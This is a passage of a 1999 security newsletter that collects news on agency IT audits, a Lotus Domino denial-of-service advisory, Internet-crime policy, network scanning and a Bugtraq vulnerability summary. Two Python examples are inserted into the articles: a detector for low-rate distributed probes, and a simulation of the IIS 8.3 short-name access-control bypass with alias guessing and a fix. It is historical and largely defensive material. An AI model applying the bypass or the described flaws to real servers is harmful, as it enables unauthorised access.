SYDNEY - A damning report from the Australian National Audit Office (ANAO) has revealed serious flaws in the IT security arrangements of six commonwealth government agencies.

Entitled 'Operation of The Classification System for Protecting Sensitive Information', the report reveals that the IT&T environments of the six unnamed agencies the ANAO audited have inadequate security protection levels. The audited agencies all had sensitive information to protect, with three of the six responsible for protecting national security information.

"Paper and electronic files were often exposed to unauthorised access because of various breakdowns in the protection of information in use or in transmission," states the report, which was tabled this month. Common breakdowns included "sensitive information stored on insecure electronic networks, and computers left on without the protection of screen saver passwords."

All six of the agencies hold sensitive information in both electronic and paper-based form, with two of the six agencies operating secure networks, and two running mainframes with large databases.

The audit found that agencies operating mainframes, with high-volume transaction processing, had better IT security than organisations with a LAN based environment; however, those with mainframes were found to have weaknesses in their LAN environment.

According to the report, "The access management controls on local area networks (LANs) were often not configured or implemented in accordance with ACSI 33 (the Australian Communications Electronic Security Instructions 33 -- a Defence Signals Directorate publication). Areas requiring attention include passwords, the number of log-on attempts and inactive user accounts. These weaknesses are of concern as all the networks carried sensitive information."

"The audit found that more attention needs to be given to establishing effective monitoring and review processes, particularly in relation to IT&T audit trails to ensure security policies and procedures are operating as management intended," said the report.

According to ANAO, all six agencies audited are failing to give sensitive information adequate protection.

Dean Kingsley, Partner, Secure e-business at Deloitte Touche Tohmatsu, commented that for many organisations IT security, outside the context of e-commerce, was "way down the priority list" since it was viewed as an overhead rather than an enabler.
@HWA

51.0 ISS X-FORCE ADVISORY ON LOTUS NOTES DOMINO SERVER 4.6
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/ by Thejian, Tuesday 24th August 1999 on 10:05 pm CET

ISS X-Force reports a denial of service attack against the integrated messaging and web application server, caused by an overflow problem in the Notes LDAP Service. Upgrading to Maintenance Release 4.6.6 or 5.0 is recommended. Here is the complete advisory.

http://xforce.iss.net/alerts/advise34.php3

ISS Security Advisory
August 23, 1999

Denial of Service Attack against Lotus Notes Domino Server 4.6

Synopsis:

Lotus Domino Server is an integrated messaging and web application server. An attacker can crash the Lotus Notes Domino server and stop e-mail and other services that Domino provides for an organization.

Description:

There is an overflow problem in the Notes LDAP Service (NLDAP), the service that handles the LDAP protocol. This overflow is related to the way that NLDAP handles the ldap_search request. By sending a large amount of data to the parameter in the ldap_search request, an attacker can cause a PANIC in the Domino Server. This will allow an attacker to stop all Domino services running on the affected machine.

Affected Versions:

Lotus Notes Domino server 4.6.

Recommended Action:

Upgrade to Maintenance release 4.6.6 or 5.0.

Additional Information:

Information in this advisory was obtained by the research of Caleb Sima of the ISS X-Force. ISS X-Force would like to thank Lotus Development Corporation for their response and handling of this vulnerability.

________

About ISS:

ISS leads the market as the source for e-business risk management solutions, serving as a trusted security provider to thousands of organizations including 21 of the 25 largest U.S. commercial banks and more than 35 government agencies.
With its Adaptive Security Management approach, ISS empowers organizations to measure and manage enterprise security risks within Intranet, extranet and electronic commerce environments. Its award-winning SAFEsuite(r) product line of intrusion detection, vulnerability management and decision support solutions are vital for protection in today's world of global connectivity, enabling organizations to proactively monitor, detect and respond to security risks. Founded in 1994, ISS is headquartered in Atlanta, GA with additional offices throughout the U.S. and international operations in Australia/New Zealand, Belgium, France, Germany, Japan, Latin America and the UK. For more information, visit the ISS Web site at www.iss.net or call 800-776-2362.

Copyright (c) 1999 by Internet Security Systems, Inc.

Permission is hereby granted for the redistribution of this Alert electronically. It is not to be edited in any way without express consent of the X-Force. If you wish to reprint the whole or any part of this Alert in any other medium excluding electronic medium, please e-mail xforce@iss.net for permission.

Disclaimer

The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.

X-Force PGP Key available at: http://xforce.iss.net/sensitive.php3 as well as on MIT's PGP key server and PGP.com's key server.

Please send suggestions, updates, and comments to: X-Force xforce@iss.net of Internet Security Systems, Inc.
@HWA

52.0 TECHNOLOGY KEY TO TRACKING DOWN INTERNET CRIME
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/ by Thejian, Tuesday 24th August 1999 on 9:45 pm CET

A recently formed working group focused on rooting out Internet-related crime may model technologies that law enforcement agencies use to sift through the Internet to keep tabs on online illegal activity. As we reported earlier, US president Clinton this month established the working group to examine how law enforcement agencies can better investigate and prosecute criminal activities conducted on the Internet. Among other things, the group will scrutinize the ways in which the government uses technology to crack down on Internet-related crime. The FBI is expected to take the lead in developing technology that the federal government will use to comb the Internet in search of criminal activity. Full story

AUGUST 23, 1999

Technology key to tracking down Internet crime

BY DOUG BROWN (dbrown@fcw.com)

A recently formed working group focused on rooting out Internet-related crime may model technologies that law enforcement agencies use to sift through the Internet to keep tabs on online illegal activity.

President Clinton this month established the working group, made up of top government officials, to examine how law enforcement agencies can better investigate and prosecute criminal activities conducted on the Internet, such as the online sale of guns and illegal drugs, fraud and the peddling of child pornography.

The Clinton administration decided to form the group because there was "recognition within the government that there were some real issues" concerning computer crime that needed to be addressed, a White House official said. "There was an explosion [of legislation] at both the federal and the state level, and there was concern that if we passed a lot of legislation without taking a systematic look at this, we would end up with a haphazard approach to the problem."
Among other things, the group will scrutinize the ways in which the government uses technology to crack down on Internet-related crime. Understanding the technologies agencies use now, the White House official said, will help the administration decide how it can improve the investigation and prosecution of online criminal activity in the future.

Some helpful technology applications may come from the FBI, a representative from which will serve on the task force. The FBI is expected to take the lead in developing technology that the federal government will use to comb the Internet in search of criminal activity.

The FBI's Baltimore field office leads a project called Innocent Images, which works to identify and arrest online sexual predators. About 20 agents are assigned to the project full time, said Special Agent Barry Maddox, a spokesman for the field office. Hundreds of other agents and local law enforcement officials in cities nationwide also work with Innocent Images. The agents join online chat groups about pedophilia or child pornography and also pose as children to try to catch pedophiles who attempt to set up face-to-face meetings. The program, which was established in 1995, has led to 378 arrests and 322 convictions, Maddox said.

Advancements developed elsewhere in the FBI also may be considered by the administration's working group. Such developments include the soon-to-be launched computer crimes squad, which will investigate crimes committed by hackers, and the National Infrastructure Protection Center, which works to prevent people or groups from hacking into vital government systems that operate such things as water supplies and transportation systems.

The group also may look at increasingly sophisticated and powerful Internet search engines as a way to sniff out Internet-related crime, said Rich Kellett, director of the General Services Administration's Emerging Information Technologies Policies Division.
With some companies laboring to "store everything that is on the Internet," Kellett said, "you can imagine what kind of base of information you could put together" with such databases. Combining powerful search engines with enormous databases would provide "interesting cross-sections of what is going on in America, including criminal activity."

Kellett also mentioned the Search for Extraterrestrial Intelligence, a project involving more than 800,000 computers networked together that share information about radio signals and work together to compute algorithms in the hope of pinpointing evidence of life in outer space. A model like this, he said, could be used to sift through Internet data in search of criminal activity.

One problem with such massive undertakings, he said, is that "the use of all of that information and sorting through it all has tremendous public policy issues, in terms of privacy," Kellett said.

Daniel Boyle, SAS Institute Inc.'s director of the Defense Department and defense intelligence, said the working group likely will consider different ways of using data mining to deal with online criminal activity. The SAS Institute, Cary, N.C., is a major supplier of custom software to the federal government.

With a tidal wave of data coursing through the Internet every day, it would be impossible to successfully locate criminal activity just through pointing and clicking a mouse, Boyle said. What is needed are data-mining software tools that sift through data in search of anomalies or patterns - things that "don't look quite right," he said. "They've got to find them first, and one of the techniques is data mining."

Of use to government investigators, he said, might be "dump logs," or records of people who have visited individual World Wide Web sites. Servers, he said, "create volumes of these logs, [which] are tremendous and...exploding every day."
The logs are used by private companies to see who is visiting their sites, but they also could be useful in tracking crime, he said.

Ari Schwartz, a policy analyst at the Washington, D.C.-based Center for Democracy and Technology, cautioned working group members to keep privacy concerns in mind when they draft their report, which is due in December.

"This discussion could lead to a whole new set of monitoring tools," he said. "We hope this doesn't change the way people surf the Net. We don't want to have people think government is monitoring their lives."

Because it is so open, the Internet already has a vital monitoring system in place: the eyes of the millions of people clicking throughout cyberspace. New monitoring tools, he said, may be superfluous.

The government is considering a plan to monitor many non-DOD computers for signs of intrusion. In its quest to protect government computers from outside attacks, the proposed plan, called the Federal Intrusion Detection Network, unnecessarily sacrifices privacy, Schwartz said.

@HWA

53.0 GOVT HOME-INVASION BILL DRIVES US PC USERS TO CANADA
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/ by Thejian, Tuesday 24th August 1999 on 9:20 pm CET

The recently proposed and already very much discussed US Justice Department bill that would allow police to secretly enter homes and disable security features on computers has driven tens of thousands of Americans to request privacy protection in the form of the Freedom product from Canadian firm Zero-Knowledge Systems, the company announced today.
Newsbytes

Govt Home Invasion Bill Drives US PC Users To Canada

By Martin Stone, Newsbytes
MONTREAL, QUEBEC, CANADA, 24 Aug 1999, 12:09 PM CST

A proposed US Justice Department bill that would allow police to secretly enter homes and disable security features on computers has driven tens of thousands of Americans to request privacy protection from Canadian firm Zero-Knowledge Systems, the company announced today.

"This has created a huge wave of concern among computer users in the US," said Zero-Knowledge President Austin Hill, of the proposed legislation.

Hill told Newsbytes that, when news of the proposed measure broke last Thursday, his office was flooded with calls and messages from American Internet users inquiring about the availability of his company's security system, called Freedom, which uses a sophisticated network of encoding and remote servers to obscure Internet "trails."

"We've received e-mail, telephone messages, and thousands of Freedom beta sign-ups from people looking to secure their privacy. It's highly ironic that a Canadian company is being flooded by requests to protect American citizens from their own government," Hill said.

Zero-Knowledge is presently beta-testing its Freedom technology, which provides total privacy for Web, e-mail, newsgroup, and chat-room activities by encrypting data and rerouting it through independently-operated servers scattered worldwide.

Hill says an improved beta version will soon enter testing and that, based on the latest flood of interest, his company is scaling up to accommodate what he says will be "millions and millions of computer-users all over the world" once the product hits the market later this year. The system has been called "the only fully trustworthy privacy solution" by some privacy advocates.
According to reports published last week, the Justice Department will seek authorization through the Cyberspace Electronic Security Act for FBI and local police to covertly enter private homes and disable computer encryption programs. The proposal would dramatically increase police powers by allowing agents to tamper with personal computers to surreptitiously monitor personal communications.

"It's disappointing that US consumers must look to other countries for protection from a government they feel is overstepping its investigative authority," David Sobel, general counsel for the Electronic Privacy Information Center in Washington, told Hill following the announcement of the proposed bill. "The United States should be in the forefront of privacy technology, not trying to circumvent it."

Montreal-based Zero-Knowledge says it benefits from Canada's support for the development of strong privacy solutions, in contrast with what it says is the US government's stringent controls on encryption and privacy technologies.

Hill says that, because his company's system masks electronic trails, law enforcement agencies would not be able to identify computers from which possibly unlawful transmissions were being made, so they would be unable to identify which house to enter under the proposed legislation. He says his system would discourage "fishing expeditions" which could result from the projected bill.

More information on the Zero-Knowledge technology can be found at http://www.zeroknowledge.com

Reported by Newsbytes.com, http://www.newsbytes.com

12:09 CST
Reposted 18:09 CST

@HWA

54.0 HACKERS SCANNING FOR TROUBLE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/ by Thejian, Tuesday 24th August 1999 on 9:00 pm CET

Every day they come, they lurk -- then they leave without doing damage. They come through clients' computers, through Canadian ISPs, they hack into Linux boxes, NT boxes, Unix boxes. Hack by day or night, but they only look and don't touch.
These kinds of vulnerability scan attacks are causing concern and also bring up some murky legal issues. Dragos Ruiu wrote a report for SecurityFocus and ZDNet has a story on it.

--------------------------------------------------------------
This story was printed from ZDNN, located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------

Hackers scanning for trouble
By Bob Sullivan, MSNBC
August 24, 1999 5:38 AM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2319298,00.html

Dragos Ruiu was just minding his own business, a Vancouver software startup, when it started. Day after day, relentlessly, someone or some group out there on the Internet is banging away at his servers, sneaking in and gaining full access. A security expert, he knows what's happening: He's being probed. Is this mere sport, or a "casing," like a bank robber who visits the bank several times to study its security systems before the heist?

Every day they come, they lurk -- then they leave without doing damage. And Ruiu is powerless to stop it. Every method he has tried, they have trumped. They're toying with him. "They must feel like gods," he says.

They come at him through clients' computers, through Canadian ISPs, once even through one of the largest Canadian banks. They hack into Linux boxes, NT boxes, Unix boxes. Hack by day or night. No matter. And all for no apparent reason. They look, but don't touch.

Ah, the life of a network administrator these days.

There are thousands of ways to break into a computer, and there are now several downloadable software packages designed to scan the Internet for Web sites and servers that have just one flaw. According to Peter Tippett at computer security research firm ICSA, a new box connected to the Net will almost certainly be "scanned" before one week goes by. And the amount of scanning activity has doubled in the past six months.
That's about when the scanning started for Brandon Pepelea, a former employee at PSINet who says his collection of Web sites has been scanned systematically several times a week since January.

In another example of a victimless probe, Pepelea thinks someone or something has been banging through all the Internet addresses between 38.240.x.x and 38.200.x.x, a so-called Class-B range of addresses that constitute about 16,000 possible computers. In his case, the scans were unsuccessful. Whoever or whatever it is, they haven't been able to break into Pepelea's computers. Still, the relentless, systematic nature of the probe has him spooked. He's been demanding that PSINet, which owns all the addresses in the 38.x.x.x range, chase down the scanner and prosecute.

"I don't think they understand how serious it is," Pepelea said. "The threat not so much being the nature of the scan but the scope of the scan... If you're between 38.240 and 38.200 you've had the scans. They've walked through and gotten to you."

Nose for trouble

The attack itself involves use of the Simple Network Management Protocol, frequently used on network routers. Pepelea owns machines between the 38.240 and 38.200 address range, and concluded scans spanned that range by studying patterns of hits to his own and his client's machines.

This is not the first time Pepelea, now CEO of a small security company he calls "Designer's Dream," has done a hefty amount of personal cybersleuthing. Last December, he compiled information on a virus writer named VicodinES, and shared it with the FBI, the CIA and other law enforcement agencies. His tips fell on deaf ears, and VicodinES, who the world now knows as Dave Smith, went on to release the Melissa virus.

Pepelea is hell-bent on being heard this time around. "Once again, nobody cares," he laments.

PSINet said early last week the scans were being generated by an account serviced by the company, and that it had dealt with the matter by canceling the account.
But by Friday, the company had canceled three more accounts in an effort to stop the probes. While officials there say they take the matter seriously, they are not convinced it's an organized hacker attack.

"It's not possible to characterize whether this is a mistake, a malicious event, was planned, or it just happened," said Cole Libby, Director of Network Engineering. For example, it could be a wrongly configured piece of hardware searching a section of the Internet for a new printer. "There are lots of examples of technology out of control in the world."

No harm, no foul?

Scanning, the cyberspace equivalent of walking down Main Street and jiggling handles to see who leaves the front door unlocked, brings up murky legal issues. Entering someone else's computer is illegal, but scanning, which amounts to asking a computer how it's been set up, probably isn't. Pepelea says PSINet told him to pursue legal action against his cyberpest -- but for what?

Meanwhile, Pepelea thinks PSINet should be liable if any real trouble ever comes from his suspected hacker, particularly since the Net provider was warned. That's not likely, says Internet law expert Dorsey Morrow. PSINet would almost certainly face no criminal liability for the actions of a hacker on their network, and wouldn't likely face civil liability either.

"As long as they can show 'We were doing everything we can. We've got security policies in place. We're using the latest software.' That mounts up to a pretty good defense," Morrow said.

So there are no consequences for scanning, either to the hacker or the company that provides the means. But what of Ruiu's hackers, who go just one step further than Pepelea's scanners? They scan, then enter, lurk around, and leave. Dancing tantalizingly over the edge of the law, they show an ability to do far more damage. Their methods are painstakingly deliberate, designed to avoid detection.
They launch attacks from multiple sites, sometimes sending no more than a packet per day from any site, in order to hide the kind of suspicious activity protective "sniffer" programs look for.

"We saw one new machine coming at us every five minutes," Ruiu said. "They must have felt like gods because they could break into any machine they wanted." That includes a collection of Canadian ISPs, and even one major Canadian bank, the hackers broke into.

When he called, Ruiu often had a tough time convincing victimized ISP administrators they'd been hacked. "The reaction of ISPs was disbelief," he said. "One didn't believe us until a marketing guy had his laptop taken out and it started sending weird packets."

Ruiu is convinced the hacks are coming from a coordinated team, because of their speed and variety. But while the cat-and-mouse game continues, he can only speculate on motive. His company, a 15-person startup called Netsentry.net, is hardly a big target. So Ruiu thinks his outside efforts in the security community are likely to blame. He recently worked on a project called "Trinux," which aimed to create a security-enhanced version of Linux that fits on one floppy disk. Among his partners was Ken Williams, who until recently ran Packet Storm Security, perhaps the most popular reference site in the hacker community.

"I suspect these guys are targeting security software," he said, but added they have not revealed their intentions. "This is really bugging me. The lack of a motive really disturbs me…it gave me the creeps."

The attacks have also been humbling for Ruiu, who has spent a lot of time chasing the hackers when he could be working to get his business off the ground. "There are a lot of assumptions we're all making about Internet security that we shouldn't," he said. "There's a lot of things we don't know."
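The pattern Ruiu describes, many source hosts each sending no more than a packet or two a day, is built to stay under the per-source thresholds a "sniffer" applies. The following is an added example, not from the article or from Ruiu's SecurityFocus report, of the target-side correlation that catches it: constructed firewall-style log lines are grouped per destination port over a multi-day window, and an alert fires when the number of distinct sources is high even though every single source stays quiet. The log format, addresses and thresholds are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample firewall-style log (not real traffic): "timestamp src dst dport".
# Nine different sources each touch port 111 on one host once or twice over five
# days; one of them also sends two quick hits to port 80, ordinary web traffic.
SAMPLE_LOG = """\
1999-08-10T02:11:05 10.1.1.5 192.0.2.10 111
1999-08-10T09:30:44 10.7.3.9 192.0.2.10 111
1999-08-11T01:02:03 10.1.1.5 192.0.2.10 111
1999-08-11T13:45:00 10.3.3.3 192.0.2.10 111
1999-08-12T04:00:00 10.2.8.8 192.0.2.10 111
1999-08-12T18:20:11 10.9.9.1 192.0.2.10 111
1999-08-13T00:01:00 10.4.4.4 192.0.2.10 111
1999-08-13T07:07:07 10.5.5.5 192.0.2.10 111
1999-08-14T11:11:11 10.6.6.6 192.0.2.10 111
1999-08-14T22:22:22 10.8.8.8 192.0.2.10 111
1999-08-12T12:00:00 10.1.1.5 192.0.2.10 80
1999-08-12T12:00:01 10.1.1.5 192.0.2.10 80
"""


def parse_log(text):
    """Parse log lines into (timestamp, src, dst, dport) tuples, oldest first."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport = line.split()
        events.append((datetime.fromisoformat(ts), src, dst, int(dport)))
    return sorted(events)


def noisy_sources(events, window=timedelta(hours=1), threshold=10):
    """The classic per-source check: flag a source that sends more than
    `threshold` packets inside any sliding `window`. One packet a day per
    source never trips this, which is exactly what the attackers rely on."""
    by_src = defaultdict(list)
    for ts, src, _, _ in events:
        by_src[src].append(ts)
    flagged = set()
    for src, stamps in by_src.items():
        start = 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:
                start += 1
            if end - start + 1 > threshold:
                flagged.add(src)
                break
    return flagged


def distributed_probes(events, window=timedelta(days=7), min_sources=5):
    """Target-side correlation: for each (dst, dport) count the distinct sources
    seen inside a sliding `window`. Report the widest window per target that
    reaches `min_sources`, with the busiest single source's packet count so the
    analyst can see how quiet each participant was."""
    by_target = defaultdict(list)
    for ts, src, dst, dport in events:
        by_target[(dst, dport)].append((ts, src))
    alerts = []
    for (dst, dport), hits in by_target.items():
        hits.sort()
        best = None
        start = 0
        for end, (ts, _) in enumerate(hits):
            while ts - hits[start][0] > window:
                start += 1
            srcs = [s for _, s in hits[start:end + 1]]
            distinct = set(srcs)
            if len(distinct) >= min_sources and (
                    best is None or len(distinct) > best["sources"]):
                best = {"dst": dst, "dport": dport, "sources": len(distinct),
                        "first": hits[start][0], "last": ts,
                        "max_packets_per_source": max(srcs.count(s) for s in distinct)}
        if best is not None:
            alerts.append(best)
    return alerts


if __name__ == "__main__":
    evts = parse_log(SAMPLE_LOG)
    print("per-source threshold flagged:", noisy_sources(evts) or "nothing")
    for alert in distributed_probes(evts):
        print("distributed probe:", alert)
```

On the sample, the per-source check flags nothing while the correlation reports nine sources against port 111 with at most two packets from any one of them.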
For example, these hackers made a habit of hijacking machines Ruiu's computers normally talked to, then initiated attacks from these supposedly "friendly" computers. That made them almost impossible to detect. "If they get a machine that's close to your machine, that's almost as bad as taking over your Web server. It's a great place to launch an attack on your firewall," he said.

Nothing about Ruiu or Pepelea's stories surprised ICSA's Tippett, who expects security problems to get worse before they get better. "It's the wild, wild West out there," he said. "The tools are pervasive and so common. The chance of getting caught is pretty slim… Our neighbors are now very close and enough of them don't have a great social conscience."

A more extensive report on one of these attacks, written by Ruiu, can be found at www.securityfocus.com.

@HWA

55.0 Canada Net: they've built a super fast network, but what to do with it?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The Great Wired North

Canada Builds the World’s Fastest Network — And Wonders How to Use It

Canada’s new CA*Net3 research network will link government, business and universities across the country with a 100 percent fiber-optic network, and then what? (ABCNEWS.com)

By Michael J. Martinez
ABCNEWS.com

Aug. 27 — What if there were a brand-new, fiber-optic, blazingly fast, nationwide computer network — and no one knew quite what to do with it?

Using a $55 million grant from the Canadian government, a consortium of universities and businesses has fashioned a next-generation, Internet-style network, stretching from Nova Scotia to British Columbia. So speedy is CA*Net3, as the network is called, that the entire contents of the U.S. Library of Congress could be transmitted from one end of Canada to the other in just one second. In the United States, the Internet2 project can handle that kind of load — but it still takes a full minute for a bicoastal download.
Canada hopes to use this world’s fastest nationwide network to stake its claim to the high-tech future. Unlike Internet2, however, CA*Net3 is finding it difficult to attract researchers who can use the brand-new network.

“Nobody knows what we’re going to use this for,” says Alan Greenberg, director of computing at McGill University in Montreal. “But that’s the reason you build these things — so that people can find new ways to do things.”

Pure Optics

Unlike other research networks, including the ARPANet system that formed the basis for today’s Internet, CA*Net3 is completely optical — no telephone lines are used. Instead, the Canadian government stretched fiber-optic cable across the country, linking it to 11 “gigapops,” network hubs that serve as switching stations for billions of bits of data per second.

Other networks, including Internet2 and the Next-Generation Internet project in the United States, also use backup layers, in addition to fiber optics, to ensure that data will continue to flow if the fiber-optic cables are cut or disrupted. However, CA*Net3 doesn’t have those backups. Instead, data are automatically rerouted at the gigapops if a disruption is detected. Rerouting uses network rings — loops of cable interconnected with the gigapops.

“In our network rings, we automatically use both sides of the ring in transmitting data,” says Bill St. Arnaud, the senior director of network projects for the Canadian Network for the Advancement of Research, Industry and Education (Canarie), which is running CA*Net3. “Thus, if one side of the loop goes down, the other side can pick up the slack.”

Rainbow of Data

CA*Net3 also employs new technology that allows different wavelengths of light to be transmitted along the same fiber-optic cable. By using eight colors of light, the amount of data sent through the cable can be increased by a factor of eight. That means 80 gigabits of data can be transmitted through CA*Net3 every second.
That’s 1.4 million times faster than the download speed of a 56K modem, and about 60 times faster than America’s Internet2 project. And it could improve even more, St. Arnaud says. Theoretically, an infinite number of wavelengths of light could pass through a fiber-optic cable without interfering with each other. Right now, researchers are working on transmitting data on 2,000 wavelengths — somewhere in the neighborhood of 20,000 gigabits or 20 terabits.

Filling the Pipe

Now all that’s needed are applications to make use of such huge bandwidth. “Everyone is used to dealing with small bandwidth,” Greenberg says. “They’re still trying to figure out how best to use this really big pipe they’ve been handed.” A few ideas have been advanced. Canada’s national human genome project, an effort to map all the DNA in the human body, is using CA*Net3 to link 40 powerful computers to perform necessary calculations. The Canadian National Film Board is also using the network, to create an on-demand movie jukebox. Computers linked to CA*Net3 can request one of 700 movies currently online. The film board’s server controls a robotic arm that can select and play the DVD-ROM of the film, sending it over CA*Net3. In the next few years, St. Arnaud hopes to link public schools to the new network, using only fiber-optic cables and giving schools total access to the immense amount of bandwidth available. From there, it’s easy to envision connecting every Canadian home to the optical network. With an increase in the number of light wavelengths available, there will be enough bandwidth for generations. And what they’ll do with it is anyone’s guess.

@HWA

56.0 Security Focus' BUGTRAQ summary
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security Focus News, Issue 3, 1999-08-16 to 1999-08-22

II. BUGTRAQ SUMMARY 1999-08-16 to 1999-08-22
----------------------------------------

1. SuSE identd Denial of Service Attack
Bugtraq ID: 587
Remote: Yes
Date Published: 1999-08-16
Relevant URL: http://www.securityfocus.com/level2/?go=vulnerabilities&id=587
Summary: In certain distributions of SuSE Linux the in.identd daemon is started with an option that causes each identd process to wait 120 seconds after answering its first request before answering the next. If a malicious remote attacker starts a large number of ident requests in a short period of time it will force the target machine to start multiple daemons. This can lead the machine to starve itself of memory, resulting essentially in a machine halt.

2. Microsoft IIS And PWS 8.3 Directory Name Vulnerability
Bugtraq ID: 582
Remote: Yes
Date Published: 1999-08-16
Relevant URL: http://www.securityfocus.com/level2/?go=vulnerabilities&id=582
Summary: In Microsoft's IIS and PWS, requesting the 8.3 filename version of a directory effectively bypasses the security attributes that are referenced to the full, long version of the filename, with permissions being based instead on those of the parent directory. Successful exploitation of this vulnerability could lead not only to unauthorized directory listings, but also to the remote execution of 'protected' scripts.

3. Multiple Vendor 8.3 Directory Name Vulnerability
Bugtraq ID: 584
Remote: Yes
Date Published: 1999-08-16
Relevant URL: http://www.securityfocus.com/level2/?go=vulnerabilities&id=584
Summary: In the Netscape, vqServer and Xitami webservers, restrictions applied to directories with long filenames will be ignored if the 8.3 version of the filename is requested. In Serv-U, the 'cwd' and 'site exec' commands are susceptible to a similar vulnerability. Other Win32-based HTTP and FTP servers may have the same or similar vulnerabilities.
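The 8.3 alias issue in entries 2 and 3 comes down to an authorization check keyed on the name the client typed rather than on the object it resolves to. The following Python is an added example, not code from Security Focus or from any of the affected servers: it builds the candidate 8.3 alias for a long directory name (a simplified version of the Windows generator, which also resolves collisions with ~2, ~3 and a hashed form), and contrasts an ACL lookup that trusts the requested spelling with one that canonicalises the first path component before consulting the ACL. The directory names, ACL entries and principals are constructed for the example.

```python
import re

# Characters Windows strips when it builds a short alias (space, plus, comma,
# semicolon, equals and square brackets). Simplified: the real generator also
# resolves collisions with ~2, ~3, ... and falls back to a hashed form.
_STRIP = re.compile(r'[\s+,;=\[\]]')

def short_name_83(long_name: str, seq: int = 1) -> str:
    """Return the DOS 8.3 alias a long file or directory name would get."""
    base, dot, ext = long_name.rpartition('.')
    if not dot:
        base, ext = long_name, ''
    base = _STRIP.sub('', base).replace('.', '').upper()
    ext = _STRIP.sub('', ext).upper()
    fits = (len(base) <= 8 and len(ext) <= 3
            and long_name.count('.') <= 1
            and not _STRIP.search(long_name))
    if fits:
        return base + ('.' + ext if ext else '')
    alias = base[:6] + '~' + str(seq)
    return alias + ('.' + ext[:3] if ext else '')

def candidate_aliases(long_name: str, max_seq: int = 4) -> list:
    """Aliases a tester would try when the exact collision count is unknown."""
    return [short_name_83(long_name, n) for n in range(1, max_seq + 1)]

# Constructed web root: long directory names and an ACL keyed on them. Only
# the long spelling has a restrictive entry; anything else inherits the root
# permissions, which is exactly the parent-directory fallback the advisory
# describes.
DIRS = ['protected-data', 'public']
ACL = {'/protected-data': {'admin'}, '/': {'anonymous', 'admin'}}

def _first_component(path: str) -> str:
    return path.strip('/').split('/', 1)[0]

def vulnerable_is_allowed(path: str, principal: str) -> bool:
    # Looks the ACL up by the spelling the client sent. '/PROTEC~1/...' has
    # no entry, so it silently falls back to the root permissions.
    key = '/' + _first_component(path)
    return principal in ACL.get(key, ACL['/'])

def canonical_dir(component: str) -> str:
    # Map whatever spelling arrived (long, upper-cased, or 8.3 alias) back to
    # the one real directory it refers to, before any policy decision.
    want = component.upper()
    for name in DIRS:
        if want == name.upper() or want in candidate_aliases(name):
            return name
    return component

def hardened_is_allowed(path: str, principal: str) -> bool:
    key = '/' + canonical_dir(_first_component(path))
    return principal in ACL.get(key, ACL['/'])

if __name__ == '__main__':
    for p in ('/protected-data/report.asp', '/PROTEC~1/report.asp'):
        print(p, 'vulnerable:', vulnerable_is_allowed(p, 'anonymous'),
              'hardened:', hardened_is_allowed(p, 'anonymous'))
```

Guessing aliases is good enough for a tester probing a server; a server fixing the bug should instead ask the filesystem for the long name of the object it is about to serve and apply policy to that, since the alias sequence number and the hashed form cannot be predicted from the long name alone.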
4. Microsoft Windows 98 IE5/Telnet Heap Overflow Vulnerability
Bugtraq ID: 586
Remote: Yes
Date Published: 1999-08-16
Relevant URL: http://www.securityfocus.com/level2/?go=vulnerabilities&id=586
Summary: Windows 98 systems running specific versions of IE5 (5.00.2314.1003 and 5.00.2314.1003IC) are susceptible to a remote vulnerability that allows the execution of arbitrary code on a target that views a malicious web page. This vulnerability is due to a combination of two different weaknesses, one in telnet.exe and one in the latest versions of IE5.

5. Oracle Intelligent Agent Vulnerability
Bugtraq ID: 585
Remote: Yes
Date Published: 1999-08-16
Relevant URL: http://www.securityfocus.com/level2/?go=vulnerabilities&id=585
Summary: Oracle installations with the 'Oracle Intelligent Agent' installed have a path related vulnerability. The problem lies in the dbsnmp program located in $ORACLE_HOME/bin. This setuid root program calls a tcl script (nmiconf.tcl) located by default in $ORACLE_HOME/network/agent/config. The problem is that dbsnmp takes the path to nmiconf.tcl from an environment variable, which can be set by a user. Therefore, intruders can force it to execute a trojaned version of nmiconf.tcl, which will run as root.

6. xmonisdn IFS/PATH Vulnerability
Bugtraq ID: 583
Remote: No
Date Published: 1999-08-16
Relevant URL: http://www.securityfocus.com/level2/?go=vulnerabilities&id=583
Summary: Xmonisdn is an X applet that shows the status of the ISDN links; it ships with the isdnutils package from Debian GNU/Linux 2.1. You can configure it to run two scripts when the left or right mouse button is clicked on it. Xmonisdn was installed setuid root so that the scripts could do things like add and delete the default route. However, while the scripts are checked for being owned by root and not writeable by group or others, they are run via the system() library function, which spawns a shell to run them. This means that the scripts are open to attack via IFS and/or PATH manipulation. Debian has made patches available at the following locations:
http://security.debian.org/dists/stable/updates/binary-alpha/isdnutils_3.0-12slink13_alpha.deb
http://security.debian.org/dists/stable/updates/binary-i386/isdnutils_3.0-12slink13_i386.deb
http://security.debian.org/dists/stable/updates/binary-sparc/isdnutils_3.0-12slink13_sparc.deb

7. Mini SQL w3-msql Vulnerability
Bugtraq ID: 591
Remote: Yes
Date Published: 1999-08-18
Relevant URL: http://www.securityfocus.com/level2/?go=vulnerabilities&id=591
Summary: Under certain versions of Mini SQL, the w3-msql CGI script allows users to view directories which are set for private access via .htaccess files. Version 2.0.11 of the Mini SQL server contains a fix for this problem. Details available at: http://support.Hughes.com.au/cgi-bin/hughes

8. AIX Source Code Browser Buffer Overflow Vulnerability
Bugtraq ID: 590
Remote: Yes
Date Published: 1999-08-18
Relevant URL: http://www.securityfocus.com/level2/?go=vulnerabilities&id=590
